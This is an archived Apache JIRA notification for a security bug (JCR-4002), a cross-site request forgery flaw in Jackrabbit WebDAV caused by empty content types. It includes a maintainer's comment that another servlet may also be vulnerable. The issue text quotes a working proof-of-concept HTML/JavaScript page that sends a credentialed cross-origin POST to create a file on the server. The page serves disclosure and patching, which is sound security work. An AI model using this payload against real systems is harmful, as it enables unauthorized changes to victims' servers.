[jira] [Comment Edited] (JCR-4002) CSRF in Jackrabbit-Webdav using empty content-type

Mon, 29 Aug 2016 06:14:36 -0700 

    [ 
https://issues.apache.org/jira/browse/JCR-4002?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=15445805#comment-15445805
 ] 

Julian Reschke edited comment on JCR-4002 at 8/29/16 1:12 PM:
--------------------------------------------------------------

As far as I can tell, JcrRemotingServlet would be vulnerable as well; it 
extends from AbstractWebdavServlet, but does support POST -- with the change to 
the CRSFUtil it leaves the code unprotected when the check is disabled.

The same might be true for other code.

I believe we need to redo this.


was (Author: reschke):
As far as I can tell, JcrRemotingServlet would be vulnerable as well; it 
extends from AbstractWebdavServlet, but does support POST.

The same might be true for other code.

> CSRF in Jackrabbit-Webdav using empty content-type
> --------------------------------------------------
>
>                 Key: JCR-4002
>                 URL: https://issues.apache.org/jira/browse/JCR-4002
>             Project: Jackrabbit Content Repository
>          Issue Type: Bug
>          Components: jackrabbit-webdav
>    Affects Versions: 2.4.5, 2.6.5, 2.8.2, 2.10.3, 2.12.3, 2.13.1
>            Reporter: Dominique Jäggi
>            Assignee: Dominique Jäggi
>            Priority: Blocker
>              Labels: csrf, security, webdav
>             Fix For: 2.13.2
>
>         Attachments: 
> JCR_4002__CSRF_in_Jackrabbit_Webdav_using_empty_content_type.patch
>
>
> As per [0] the CSRF content-type check does not include a null request 
> content type. This can be exploited to create a resource via CSRF like so:
> {code}
> <html>
>   <body>
>     <script>
>       function submitRequest()
>       {
>         var xhr = new XMLHttpRequest();
>         xhr.open("POST", "http://localhost:42427/test/csrf.txt";, true);
>         xhr.withCredentials = true;
>         var body = "This file has been uploaded via CSRF.=\r\n";
>         var aBody = new Uint8Array(body.length);
>         for (var i = 0; i < aBody.length; i++)
>           aBody[i] = body.charCodeAt(i); 
>         xhr.send(new Blob([aBody]));
>       }
>     </script>
>     <form action="#">
>       <input type="button" value="Submit request" onclick="submitRequest();" 
> />
>     </form>
>   </body>
> </html>
> {code}
> I will mitigate this particular issue by including a null content type in the 
> list of rejected content types.
> [0] https://github.com/cryptomator/cryptomator/issues/319



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)

Reply via email to